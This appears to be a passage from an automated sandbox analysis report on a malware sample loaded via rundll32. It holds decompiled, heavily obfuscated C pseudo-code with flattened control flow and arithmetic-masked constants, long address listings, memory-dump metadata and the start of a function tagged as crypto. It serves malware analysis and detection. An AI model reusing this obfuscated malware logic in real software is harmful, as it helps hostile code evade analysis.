				_v308 = _v308 | 0x23438f89;
				_v308 = _v308 ^ 0x95557e79;
				_v308 = _v308 ^ 0xb625da34;
				_v260 = 0x6632ca;
				_v260 = _v260 << 0xc;
				_v260 = _v260 / _t780;
				_v260 = _v260 ^ 0x011a1b64;
				_v316 = 0x1ead1d;
				_v316 = _v316 >> 0xf;
				_v316 = _v316 << 0xe;
				_v316 = _v316 ^ 0x000acc6a;
				_v388 = 0xc01c7d;
				_v388 = _v388 >> 9;
				_v388 = _v388 | 0xa159bc3f;
				_v388 = _v388 ^ 0x1058b9c4;
				_v388 = _v388 ^ 0xb10bd724;
				_v256 = 0x2459a9;
				_v256 = _v256 + 0xffff58c0;
				_v256 = _v256 >> 0xc;
				_v256 = _v256 ^ 0x000386a3;
				_v340 = 0xa38d0b;
				_t781 = 0x78;
				_v340 = _v340 / _t781;
				_v340 = _v340 ^ 0x3e3bd45c;
				_v340 = _v340 + 0xf3c0;
				_v340 = _v340 ^ 0x3e3a819a;
				_v380 = 0x2dd945;
				_v380 = _v380 << 4;
				_v380 = _v380 + 0xffffb7c2;
				_v380 = _v380 << 6;
				_v380 = _v380 ^ 0xb75574a7;
				_v272 = 0xf6939e;
				_v272 = _v272 | 0x851c2f86;
				_v272 = _v272 + 0xffff0412;
				_v272 = _v272 ^ 0x85fd1a3b;
				_v188 = 0x2c17e;
				_v188 = _v188 >> 3;
				_v188 = _v188 ^ 0x000c5ae0;
				_v280 = 0xf08b81;
				_v280 = _v280 | 0x75266007;
				_v280 = _v280 ^ 0xc75f894a;
				_v280 = _v280 ^ 0xb2a4e63e;
				_v372 = 0x6f48a0;
				_v372 = _v372 << 0xa;
				_v372 = _v372 >> 0x10;
				_v372 = _v372 | 0x5e122b7b;
				_v372 = _v372 ^ 0x5e16ce05;
				_v184 = 0x747075;
				_v184 = _v184 + 0xcea0;
				_v184 = _v184 ^ 0x007a5d3b;
				_v128 = 0x4ebeca;
				_v128 = _v128 + 0xffffee54;
				_v128 = _v128 ^ 0x004a846f;
				_v120 = 0xe78fe5;
				_t868 = 0x80c65ec;
				_v120 = _v120 + 0xffff4f7b;
				_t864 = 0xf9e92c1;
				_v120 = _v120 ^ 0x00e2ece2;
				_v276 = 0xe2917e;
				_v276 = _v276 << 6;
				_v276 = _v276 + 0xffff0dfb;
				_v276 = _v276 ^ 0x38a72339;
				_v176 = 0x1ec236;
				_v176 = _v176 ^ 0x7af5486d;
				_v176 = _v176 ^ 0x7aeb8f45;
				_v244 = 0x4d92e1;
				_t782 = 0x5f;
				_v88 = 0x20;
				_v244 = _v244 * 0x4a;
				_v244 = _v244 | 0x7c3f7c28;
				_v244 = _v244 ^ 0x7e7c1ac2;
				_v284 = 0xc8aa60;
				_v284 = _v284 + 0x32b9;
				_v284 = _v284 + 0xffff127a;
				_v284 = _v284 ^ 0x00c1b775;
				_v228 = 0x32f957;
				_v228 = _v228 << 0xa;
				_v228 = _v228 ^ 0xe304a089;
				_v228 = _v228 ^ 0x28edcf32;
				_v364 = 0x1a55e7;
				_v364 = _v364 * 0x68;
				_v364 = _v364 * 0x36;
				_v364 = _v364 ^ 0xa842ca33;
				_v364 = _v364 ^ 0xe9f59c27;
				_v168 = 0x34b570;
				_v168 = _v168 | 0x6b6928c5;
				_v168 = _v168 ^ 0x6b739674;
				_v104 = 0x8a8082;
				_v104 = _v104 * 0x3f;
				_v104 = _v104 ^ 0x2214377a;
				_v212 = 0x18307b;
				_v212 = _v212 ^ 0x4b6e1055;
				_v212 = _v212 ^ 0x41119872;
				_v212 = _v212 ^ 0x0a6c434c;
				_v132 = 0x8b3f3c;
				_v132 = _v132 << 2;
				_v132 = _v132 ^ 0x022c35f2;
				_v328 = 0x314aa5;
				_v328 = _v328 | 0xbabb419f;
				_v328 = _v328 / _t782;
				_v328 = _v328 + 0xe73f;
				_v328 = _v328 ^ 0x01f1132e;
				_v140 = 0x403514;
				_v140 = _v140 + 0xffff4e06;
				_v140 = _v140 ^ 0x0039264a;
				while(1) {
					L1:
					_t783 = 0xf0ee26a;
					_t842 = 0xbf4f028;
					_t716 = 0xc1f5c56;
					do {
						while(1) {
							L2:
							_t878 = _t766 - _t716;
							if(_t878 > 0) {
								break;
							}
							if(_t878 == 0) {
								_push(_v160);
								_push(_v112);
								_t732 = E002EDCF7(_v396, 0x2d1884, __eflags);
								_push(_v392);
								_t866 = _t732;
								_push(_v384);
								_t733 = E002EDCF7(_v152, 0x2d1924, __eflags);
								_v76 = _v124;
								_t735 = E002DCB52(_v376, _t866, _v268, _v116, _v144);
								_v68 = _v68 & 0x00000000;
								_v72 = _t866;
								_v80 = 2 + _t735 * 2;
								_v60 =  &_v80;
								_v92 = _v88;
								_v64 = 1;
								_t741 = E002D8D13( &_v32, _v200, _v368,  &_v92, _v84, _t733, _v312,  &_v68, _v88, _v320, _v136, _v236);
								_t875 =  &(_t875[0x11]);
								__eflags = _t741 - _v304;
								_t766 =  ==  ? 0xbf4f028 : 0xf9e92c1;
								E002DA8B0(_v296, _t866, _v196);
								E002DA8B0(_v360, _t733, _v288);
								_t864 = 0xf9e92c1;
								goto L24;
							} else {
								if(_t766 == 0xdec32e) {
									_t746 =  *0x2f3dfc; // 0x0
									E002E8519(_v104, _v212,  *((intOrPtr*)(_t746 + 0x50)));
									_t766 = _t864;
									while(1) {
										L1:
										_t783 = 0xf0ee26a;
										_t842 = 0xbf4f028;
										_t716 = 0xc1f5c56;
										goto L2;
									}
								} else {
									if(_t766 == 0x41de8e2) {
										_t766 = 0xe078043;
										continue;
									} else {
										if(_t766 == _t868) {
											_push(_v128);
											_push(_v184);
											_t871 = E002EDCF7(_v372, 0x2d1904, __eflags);
											_t585 =  &_v300; // 0x3e0de8e7
											_v44 =  *_t585;
											_v40 = _v252;
											_pop(_t807);
											_v36 = _v100;
											_t752 =  *0x2f3dfc; // 0x0
											_t754 =  *0x2f3dfc; // 0x0
											_t755 =  *0x2f3dfc; // 0x0
											_t757 = E002ED84C(_t807, _v120, _t755 + 0x64, _v276,  *((intOrPtr*)(_t754 + 0x54)), _v96, _v176, _v244, _v284, _v228, _v292, _t807, _t748,  &_v44,  *((intOrPtr*)(_t752 + 0x50)));
											_t875 =  &(_t875[0xd]);
											__eflags = _t757 - _v348;
											if(_t757 != _v348) {
												_t766 = 0xdec32e;
											} else {
												_t766 = _t864;
												_t873 = 1;
											}
											E002DA8B0(_v364, _t871, _v168);
											goto L24;
										} else {
											_t882 = _t766 - _t842;
											if(_t766 == _t842) {
												_push(_v192);
												_push(_v332);
												_t759 = E002EDCF7(_v108, 0x2d18b4, _t882);
												_pop(_t812);
												_t760 =  *0x2f3dfc; // 0x0
												E002F0B68(_t759,  &_v92, _v220, _v204, _t812, _t760 + 0x54, _v308, _v260, _v316, _v388, _v96, _v256);
												_t766 =  ==  ? 0xf0ee26a : _t864;
												E002DA8B0(_v340, _t759, _v380);
												L23:
												_t875 =  &(_t875[0xb]);
												L24:
												_t842 = 0xbf4f028;
												_t783 = 0xf0ee26a;
												_t868 = 0x80c65ec;
												_t716 = 0xc1f5c56;
											}
										}
										goto L25;
									}
								}
							}
							L20:
							return _t873;
						}
						__eflags = _t766 - 0xe078043;
						if(__eflags == 0) {
							_push(_v264);
							_push(_v352);
							_t717 = E002EDCF7(_v324, 0x2d18e4, __eflags);
							_push(_v248);
							_push(_v180);
							_t718 = E002EDCF7(_v240, 0x2d1814, __eflags);
							_t665 =  &_v172; // 0x39264a
							__eflags = E002D9462(_t717,  *_t665,  &_v96, _t718, _v336, _v344) - _v232;
							_t766 =  ==  ? 0xc1f5c56 : 0x1d0239b;
							E002DA8B0(_v216, _t717, _v224);
							E002DA8B0(_v148, _t718, _v156);
							_t864 = 0xf9e92c1;
							goto L23;
						} else {
							__eflags = _t766 - _t783;
							if(_t766 == _t783) {
								_t848 =  *0x2f3dfc; // 0x0
								_push(_t783);
								_push(_t783);
								_t792 = E002D7FF2( *((intOrPtr*)(_t848 + 0x54)));
								_t730 =  *0x2f3dfc; // 0x0
								__eflags = _t792;
								_t766 =  !=  ? _t868 : _t864;
								 *((intOrPtr*)(_t730 + 0x50)) = _t792;
								goto L1;
							} else {
								__eflags = _t766 - _t864;
								if(__eflags != 0) {
									goto L25;
								} else {
									_t646 =  &_v140; // 0x39264a
									E002D957D(_v96, _v132, _v328, _v208,  *_t646);
								}
							}
						}
						goto L20;
						L25:
					} while (_t766 != 0x1d0239b);
					goto L20;
				}
			}







































































































































                                                                                                                                  0x002d2bd9
                                                                                                                                  0x002d2bdf
                                                                                                                                  0x002d2bee
                                                                                                                                  0x002d2bf0
                                                                                                                                  0x002d2bf7
                                                                                                                                  0x002d2bfe
                                                                                                                                  0x002d2c03
                                                                                                                                  0x002d2c0a
                                                                                                                                  0x002d2c12
                                                                                                                                  0x002d2c1a
                                                                                                                                  0x002d2c22
                                                                                                                                  0x002d2c2a
                                                                                                                                  0x002d2c35
                                                                                                                                  0x002d2c40
                                                                                                                                  0x002d2c4b
                                                                                                                                  0x002d2c56
                                                                                                                                  0x002d2c61
                                                                                                                                  0x002d2c6c
                                                                                                                                  0x002d2c77
                                                                                                                                  0x002d2c88
                                                                                                                                  0x002d2c89
                                                                                                                                  0x002d2c8d
                                                                                                                                  0x002d2c92
                                                                                                                                  0x002d2c9a
                                                                                                                                  0x002d2ca2
                                                                                                                                  0x002d2cad
                                                                                                                                  0x002d2cb8
                                                                                                                                  0x002d2cc3
                                                                                                                                  0x002d2cce
                                                                                                                                  0x002d2cd9
                                                                                                                                  0x002d2ce1
                                                                                                                                  0x002d2cec
                                                                                                                                  0x002d2cf7
                                                                                                                                  0x002d2cff
                                                                                                                                  0x002d2d04
                                                                                                                                  0x002d2d09
                                                                                                                                  0x002d2d11
                                                                                                                                  0x002d2d1c
                                                                                                                                  0x002d2d2e
                                                                                                                                  0x002d2d35
                                                                                                                                  0x002d2d40
                                                                                                                                  0x002d2d48
                                                                                                                                  0x002d2d50
                                                                                                                                  0x002d2d5d
                                                                                                                                  0x002d2d61
                                                                                                                                  0x002d2d69
                                                                                                                                  0x002d2d76
                                                                                                                                  0x002d2d80
                                                                                                                                  0x002d2d84
                                                                                                                                  0x002d2d8c
                                                                                                                                  0x002d2d94
                                                                                                                                  0x002d2d9c
                                                                                                                                  0x002d2da9
                                                                                                                                  0x002d2dad
                                                                                                                                  0x002d2db5
                                                                                                                                  0x002d2dc0
                                                                                                                                  0x002d2dc8
                                                                                                                                  0x002d2dd3
                                                                                                                                  0x002d2dde
                                                                                                                                  0x002d2de9
                                                                                                                                  0x002d2df4
                                                                                                                                  0x002d2dff
                                                                                                                                  0x002d2e07
                                                                                                                                  0x002d2e0b
                                                                                                                                  0x002d2e13
                                                                                                                                  0x002d2e1d
                                                                                                                                  0x002d2e29
                                                                                                                                  0x002d2e2e
                                                                                                                                  0x002d2e34
                                                                                                                                  0x002d2e39
                                                                                                                                  0x002d2e41
                                                                                                                                  0x002d2e49
                                                                                                                                  0x002d2e54
                                                                                                                                  0x002d2e5f
                                                                                                                                  0x002d2e6a
                                                                                                                                  0x002d2e75
                                                                                                                                  0x002d2e80
                                                                                                                                  0x002d2e8b
                                                                                                                                  0x002d2e96
                                                                                                                                  0x002d2ea1
                                                                                                                                  0x002d2eac
                                                                                                                                  0x002d2eb7
                                                                                                                                  0x002d2ec2
                                                                                                                                  0x002d2ed5
                                                                                                                                  0x002d2ed6
                                                                                                                                  0x002d2edd
                                                                                                                                  0x002d2ee8
                                                                                                                                  0x002d2ef3
                                                                                                                                  0x002d2f06
                                                                                                                                  0x002d2f0d
                                                                                                                                  0x002d2f18
                                                                                                                                  0x002d2f2c
                                                                                                                                  0x002d2f33
                                                                                                                                  0x002d2f3e
                                                                                                                                  0x002d2f46
                                                                                                                                  0x002d2f4e
                                                                                                                                  0x002d2f53
                                                                                                                                  0x002d2f58
                                                                                                                                  0x002d2f60
                                                                                                                                  0x002d2f6b
                                                                                                                                  0x002d2f7e
                                                                                                                                  0x002d2f85
                                                                                                                                  0x002d2f90
                                                                                                                                  0x002d2fa3
                                                                                                                                  0x002d2fb2
                                                                                                                                  0x002d2fb9
                                                                                                                                  0x002d2fc4
                                                                                                                                  0x002d2fcf
                                                                                                                                  0x002d2fda
                                                                                                                                  0x002d2fe5
                                                                                                                                  0x002d2ff0
                                                                                                                                  0x002d2ffb
                                                                                                                                  0x002d3006
                                                                                                                                  0x002d300e
                                                                                                                                  0x002d3016
                                                                                                                                  0x002d301b
                                                                                                                                  0x002d3023
                                                                                                                                  0x002d302b
                                                                                                                                  0x002d3036
                                                                                                                                  0x002d3041
                                                                                                                                  0x002d304c
                                                                                                                                  0x002d3057
                                                                                                                                  0x002d3062
                                                                                                                                  0x002d306d
                                                                                                                                  0x002d3078
                                                                                                                                  0x002d3083
                                                                                                                                  0x002d308e
                                                                                                                                  0x002d3096
                                                                                                                                  0x002d30a3
                                                                                                                                  0x002d30a7
                                                                                                                                  0x002d30af
                                                                                                                                  0x002d30b7
                                                                                                                                  0x002d30bf
                                                                                                                                  0x002d30c7
                                                                                                                                  0x002d30cf
                                                                                                                                  0x002d30d7
                                                                                                                                  0x002d30df
                                                                                                                                  0x002d30e9
                                                                                                                                  0x002d30ee
                                                                                                                                  0x002d30f6
                                                                                                                                  0x002d30fb
                                                                                                                                  0x002d3103
                                                                                                                                  0x002d310e
                                                                                                                                  0x002d3119
                                                                                                                                  0x002d3121
                                                                                                                                  0x002d312c
                                                                                                                                  0x002d3141
                                                                                                                                  0x002d3144
                                                                                                                                  0x002d314b
                                                                                                                                  0x002d3156
                                                                                                                                  0x002d3169
                                                                                                                                  0x002d3170
                                                                                                                                  0x002d317b
                                                                                                                                  0x002d3191
                                                                                                                                  0x002d3198
                                                                                                                                  0x002d31a3
                                                                                                                                  0x002d31ab
                                                                                                                                  0x002d31b0
                                                                                                                                  0x002d31b4
                                                                                                                                  0x002d31bc
                                                                                                                                  0x002d31c4
                                                                                                                                  0x002d31cc
                                                                                                                                  0x002d31d4
                                                                                                                                  0x002d31dc
                                                                                                                                  0x002d31e4
                                                                                                                                  0x002d31f4
                                                                                                                                  0x002d31fc
                                                                                                                                  0x002d3201
                                                                                                                                  0x002d3207
                                                                                                                                  0x002d320f
                                                                                                                                  0x002d3221
                                                                                                                                  0x002d3226
                                                                                                                                  0x002d322f
                                                                                                                                  0x002d323a
                                                                                                                                  0x002d3242
                                                                                                                                  0x002d324a
                                                                                                                                  0x002d3252
                                                                                                                                  0x002d325a
                                                                                                                                  0x002d3265
                                                                                                                                  0x002d326d
                                                                                                                                  0x002d3278
                                                                                                                                  0x002d3284
                                                                                                                                  0x002d3289
                                                                                                                                  0x002d3293
                                                                                                                                  0x002d3298
                                                                                                                                  0x002d32a2
                                                                                                                                  0x002d32a5
                                                                                                                                  0x002d32a9
                                                                                                                                  0x002d32b1
                                                                                                                                  0x002d32c2
                                                                                                                                  0x002d32c5
                                                                                                                                  0x002d32cc
                                                                                                                                  0x002d32d7
                                                                                                                                  0x002d32e2
                                                                                                                                  0x002d32ed
                                                                                                                                  0x002d32f8
                                                                                                                                  0x002d3303
                                                                                                                                  0x002d330b
                                                                                                                                  0x002d3313
                                                                                                                                  0x002d331b
                                                                                                                                  0x002d3323
                                                                                                                                  0x002d332b
                                                                                                                                  0x002d3336
                                                                                                                                  0x002d3341
                                                                                                                                  0x002d334c
                                                                                                                                  0x002d3357
                                                                                                                                  0x002d335e
                                                                                                                                  0x002d3369
                                                                                                                                  0x002d3371
                                                                                                                                  0x002d3379
                                                                                                                                  0x002d3381
                                                                                                                                  0x002d3389
                                                                                                                                  0x002d3394
                                                                                                                                  0x002d33a7
                                                                                                                                  0x002d33ae
                                                                                                                                  0x002d33b9
                                                                                                                                  0x002d33c1
                                                                                                                                  0x002d33c6
                                                                                                                                  0x002d33cb
                                                                                                                                  0x002d33d3
                                                                                                                                  0x002d33db
                                                                                                                                  0x002d33e0
                                                                                                                                  0x002d33e8
                                                                                                                                  0x002d33f0
                                                                                                                                  0x002d33f8
                                                                                                                                  0x002d3403
                                                                                                                                  0x002d340e
                                                                                                                                  0x002d3416
                                                                                                                                  0x002d3421
                                                                                                                                  0x002d342d
                                                                                                                                  0x002d3430
                                                                                                                                  0x002d3434
                                                                                                                                  0x002d343c
                                                                                                                                  0x002d3444
                                                                                                                                  0x002d344c
                                                                                                                                  0x002d3454
                                                                                                                                  0x002d3459
                                                                                                                                  0x002d3461
                                                                                                                                  0x002d3466
                                                                                                                                  0x002d346e
                                                                                                                                  0x002d3479
                                                                                                                                  0x002d3484
                                                                                                                                  0x002d348f
                                                                                                                                  0x002d349a
                                                                                                                                  0x002d34a5
                                                                                                                                  0x002d34ad
                                                                                                                                  0x002d34b8
                                                                                                                                  0x002d34c3
                                                                                                                                  0x002d34ce
                                                                                                                                  0x002d34d9
                                                                                                                                  0x002d34e4
                                                                                                                                  0x002d34ec
                                                                                                                                  0x002d34f1
                                                                                                                                  0x002d34f6
                                                                                                                                  0x002d34fe
                                                                                                                                  0x002d3506
                                                                                                                                  0x002d3511
                                                                                                                                  0x002d351c
                                                                                                                                  0x002d3527
                                                                                                                                  0x002d3532
                                                                                                                                  0x002d353d
                                                                                                                                  0x002d354a
                                                                                                                                  0x002d3555
                                                                                                                                  0x002d355a
                                                                                                                                  0x002d3565
                                                                                                                                  0x002d356a
                                                                                                                                  0x002d3575
                                                                                                                                  0x002d3580
                                                                                                                                  0x002d3588
                                                                                                                                  0x002d3593
                                                                                                                                  0x002d359e
                                                                                                                                  0x002d35a9
                                                                                                                                  0x002d35b4
                                                                                                                                  0x002d35bf
                                                                                                                                  0x002d35d4
                                                                                                                                  0x002d35d5
                                                                                                                                  0x002d35e0
                                                                                                                                  0x002d35e7
                                                                                                                                  0x002d35f2
                                                                                                                                  0x002d35fd
                                                                                                                                  0x002d3608
                                                                                                                                  0x002d3613
                                                                                                                                  0x002d361e
                                                                                                                                  0x002d3629
                                                                                                                                  0x002d3634
                                                                                                                                  0x002d363c
                                                                                                                                  0x002d3647
                                                                                                                                  0x002d3652
                                                                                                                                  0x002d365f
                                                                                                                                  0x002d3668
                                                                                                                                  0x002d366c
                                                                                                                                  0x002d3674
                                                                                                                                  0x002d367c
                                                                                                                                  0x002d3687
                                                                                                                                  0x002d3692
                                                                                                                                  0x002d369d
                                                                                                                                  0x002d36b0
                                                                                                                                  0x002d36b7
                                                                                                                                  0x002d36c2
                                                                                                                                  0x002d36cd
                                                                                                                                  0x002d36d8
                                                                                                                                  0x002d36e3
                                                                                                                                  0x002d36ee
                                                                                                                                  0x002d36f9
                                                                                                                                  0x002d3701
                                                                                                                                  0x002d370c
                                                                                                                                  0x002d3714
                                                                                                                                  0x002d3722
                                                                                                                                  0x002d3726
                                                                                                                                  0x002d372e
                                                                                                                                  0x002d3736
                                                                                                                                  0x002d3741
                                                                                                                                  0x002d374c
                                                                                                                                  0x002d3757
                                                                                                                                  0x002d3757
                                                                                                                                  0x002d3757
                                                                                                                                  0x002d375c
                                                                                                                                  0x002d3761
                                                                                                                                  0x002d3766
                                                                                                                                  0x002d3766
                                                                                                                                  0x002d3766
                                                                                                                                  0x002d3766
                                                                                                                                  0x002d3768
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d376e
                                                                                                                                  0x002d392a
                                                                                                                                  0x002d3936
                                                                                                                                  0x002d3941
                                                                                                                                  0x002d3946
                                                                                                                                  0x002d394f
                                                                                                                                  0x002d3951
                                                                                                                                  0x002d395c
                                                                                                                                  0x002d3973
                                                                                                                                  0x002d398c
                                                                                                                                  0x002d3998
                                                                                                                                  0x002d39b5
                                                                                                                                  0x002d39c3
                                                                                                                                  0x002d39d1
                                                                                                                                  0x002d39e0
                                                                                                                                  0x002d39fd
                                                                                                                                  0x002d3a1c
                                                                                                                                  0x002d3a23
                                                                                                                                  0x002d3a2f
                                                                                                                                  0x002d3a43
                                                                                                                                  0x002d3a46
                                                                                                                                  0x002d3a58
                                                                                                                                  0x002d3a5f
                                                                                                                                  0x00000000
                                                                                                                                  0x002d3774
                                                                                                                                  0x002d377a
                                                                                                                                  0x002d3907
                                                                                                                                  0x002d391d
                                                                                                                                  0x002d3923
                                                                                                                                  0x002d3757
                                                                                                                                  0x002d3757
                                                                                                                                  0x002d3757
                                                                                                                                  0x002d375c
                                                                                                                                  0x002d3761
                                                                                                                                  0x00000000
                                                                                                                                  0x002d3761
                                                                                                                                  0x002d3780
                                                                                                                                  0x002d3786
                                                                                                                                  0x002d38fd
                                                                                                                                  0x00000000
                                                                                                                                  0x002d378c
                                                                                                                                  0x002d378e
                                                                                                                                  0x002d3829
                                                                                                                                  0x002d3835
                                                                                                                                  0x002d3845
                                                                                                                                  0x002d3847
                                                                                                                                  0x002d384b
                                                                                                                                  0x002d385a
                                                                                                                                  0x002d3868
                                                                                                                                  0x002d3869
                                                                                                                                  0x002d3870
                                                                                                                                  0x002d38a5
                                                                                                                                  0x002d38bb
                                                                                                                                  0x002d38cb
                                                                                                                                  0x002d38d0
                                                                                                                                  0x002d38d3
                                                                                                                                  0x002d38d7
                                                                                                                                  0x002d38e0
                                                                                                                                  0x002d38d9
                                                                                                                                  0x002d38db
                                                                                                                                  0x002d38dd
                                                                                                                                  0x002d38dd
                                                                                                                                  0x002d38f2
                                                                                                                                  0x00000000
                                                                                                                                  0x002d3794
                                                                                                                                  0x002d3794
                                                                                                                                  0x002d3796
                                                                                                                                  0x002d379c
                                                                                                                                  0x002d37a8
                                                                                                                                  0x002d37b3
                                                                                                                                  0x002d37b9
                                                                                                                                  0x002d37e4
                                                                                                                                  0x002d37fe
                                                                                                                                  0x002d381c
                                                                                                                                  0x002d381f
                                                                                                                                  0x002d3b98
                                                                                                                                  0x002d3b98
                                                                                                                                  0x002d3b9b
                                                                                                                                  0x002d3b9b
                                                                                                                                  0x002d3ba0
                                                                                                                                  0x002d3ba5
                                                                                                                                  0x002d3baa
                                                                                                                                  0x002d3baa
                                                                                                                                  0x002d3796
                                                                                                                                  0x00000000
                                                                                                                                  0x002d378e
                                                                                                                                  0x002d3786
                                                                                                                                  0x002d377a
                                                                                                                                  0x002d3aa7
                                                                                                                                  0x002d3ab1
                                                                                                                                  0x002d3ab1
                                                                                                                                  0x002d3a69
                                                                                                                                  0x002d3a6f
                                                                                                                                  0x002d3aef
                                                                                                                                  0x002d3afb
                                                                                                                                  0x002d3b03
                                                                                                                                  0x002d3b08
                                                                                                                                  0x002d3b16
                                                                                                                                  0x002d3b24
                                                                                                                                  0x002d3b3e
                                                                                                                                  0x002d3b68
                                                                                                                                  0x002d3b76
                                                                                                                                  0x002d3b79
                                                                                                                                  0x002d3b8e
                                                                                                                                  0x002d3b93
                                                                                                                                  0x00000000
                                                                                                                                  0x002d3a71
                                                                                                                                  0x002d3a71
                                                                                                                                  0x002d3a73
                                                                                                                                  0x002d3ac7
                                                                                                                                  0x002d3acd
                                                                                                                                  0x002d3ace
                                                                                                                                  0x002d3ad9
                                                                                                                                  0x002d3add
                                                                                                                                  0x002d3ae2
                                                                                                                                  0x002d3ae4
                                                                                                                                  0x002d3ae7
                                                                                                                                  0x00000000
                                                                                                                                  0x002d3a75
                                                                                                                                  0x002d3a75
                                                                                                                                  0x002d3a77
                                                                                                                                  0x00000000
                                                                                                                                  0x002d3a7d
                                                                                                                                  0x002d3a7d
                                                                                                                                  0x002d3a9d
                                                                                                                                  0x002d3aa2
                                                                                                                                  0x002d3a77
                                                                                                                                  0x002d3a73
                                                                                                                                  0x00000000
                                                                                                                                  0x002d3baf
                                                                                                                                  0x002d3baf
                                                                                                                                  0x00000000
                                                                                                                                  0x002d3bbb

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: "$ $(|?|$;]z$='mm$?$I*5$J&9$J&9$LCl$c@9$lT&$t1 $Y($>
                                                                                                                                  • API String ID: 0-1427316221
                                                                                                                                  • Opcode ID: 64364a64c53530a6c4355c51e311c14b97c2dd1c9780bebf111fb532956d41b0
                                                                                                                                  • Instruction ID: 996966ff6cae9634933e994e3e7d930ade589109f4055f23cf15ad8759c6252a
                                                                                                                                  • Opcode Fuzzy Hash: 64364a64c53530a6c4355c51e311c14b97c2dd1c9780bebf111fb532956d41b0
                                                                                                                                  • Instruction Fuzzy Hash: 1072FE715093818FD3B8CF25C58AB9BBBE1BBC4304F10891EE5DA96260DBB58959CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002EAE6D Relevance: 19.3, Strings: 15, Instructions: 522COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002EAE6D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				void* _t537;
				void* _t566;
				void* _t567;
				intOrPtr _t573;
				void* _t575;
				void* _t577;
				void* _t585;
				void* _t588;
				void* _t594;
				void* _t596;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t608;
				signed int _t609;
				signed int _t610;
				void* _t611;
				void* _t633;
				void* _t660;
				void* _t675;
				intOrPtr _t677;
				intOrPtr _t680;
				signed int* _t682;
				void* _t685;

				_push(_a20);
				_t677 = __edx;
				_push(_a16);
				_v24 = __edx;
				_push(0x20);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t537);
				_v8 = 0x673696;
				_t680 = 0;
				_v4 = 0;
				_t682 =  &(( &_v272)[7]);
				_v144 = 0xf00d33;
				_v144 = _v144 | 0x228e8b2e;
				_t596 = 0x1d3710;
				_v144 = _v144 >> 8;
				_v144 = _v144 ^ 0x0022fe8f;
				_v244 = 0xde08aa;
				_t603 = 0x17;
				_v244 = _v244 / _t603;
				_v244 = _v244 + 0xffff54ea;
				_v244 = _v244 << 0xa;
				_v244 = _v244 ^ 0x23f0fc00;
				_v224 = 0x36cb35;
				_v224 = _v224 | 0xc39aec51;
				_v224 = _v224 + 0x9146;
				_t604 = 0x62;
				_v224 = _v224 * 0x70;
				_v224 = _v224 ^ 0xa3c851d0;
				_v116 = 0xf2e64b;
				_v116 = _v116 << 5;
				_v116 = _v116 ^ 0x1e5cc960;
				_v248 = 0x2b7d5f;
				_t43 =  &_v248; // 0x2b7d5f
				_v248 =  *_t43 * 0x53;
				_v248 = _v248 + 0x8561;
				_v248 = _v248 | 0xae4dc352;
				_v248 = _v248 ^ 0xae5feb7e;
				_v80 = 0xe6036b;
				_v80 = _v80 * 0xb;
				_v80 = _v80 ^ 0x09e22599;
				_v240 = 0x5b8b4f;
				_v240 = _v240 + 0xffffe1e0;
				_v240 = _v240 ^ 0xb7b7812a;
				_v240 = _v240 + 0xffff41e0;
				_v240 = _v240 ^ 0xb7ec2de5;
				_v232 = 0xf81ab6;
				_v232 = _v232 ^ 0xa56b9217;
				_v232 = _v232 | 0x431a55e8;
				_v232 = _v232 << 7;
				_v232 = _v232 ^ 0xcdeef480;
				_v184 = 0xddfe73;
				_v184 = _v184 * 0x26;
				_v184 = _v184 << 8;
				_v184 = _v184 ^ 0xf3c51200;
				_v120 = 0x644fb5;
				_v120 = _v120 >> 6;
				_v120 = _v120 / _t604;
				_v120 = _v120 ^ 0x00000418;
				_v60 = 0xc6ff9f;
				_v60 = _v60 ^ 0x0d96ce7d;
				_v60 = _v60 ^ 0x0d5031e2;
				_v204 = 0xeedb74;
				_v204 = _v204 >> 0xb;
				_v204 = _v204 >> 0xa;
				_v204 = _v204 | 0xba569879;
				_v204 = _v204 ^ 0xba56987f;
				_v268 = 0x9a0618;
				_v268 = _v268 ^ 0x10270239;
				_v268 = _v268 ^ 0x733075d3;
				_t605 = 0x16;
				_v268 = _v268 / _t605;
				_v268 = _v268 ^ 0x04865c22;
				_v160 = 0x655fad;
				_v160 = _v160 >> 3;
				_v160 = _v160 >> 4;
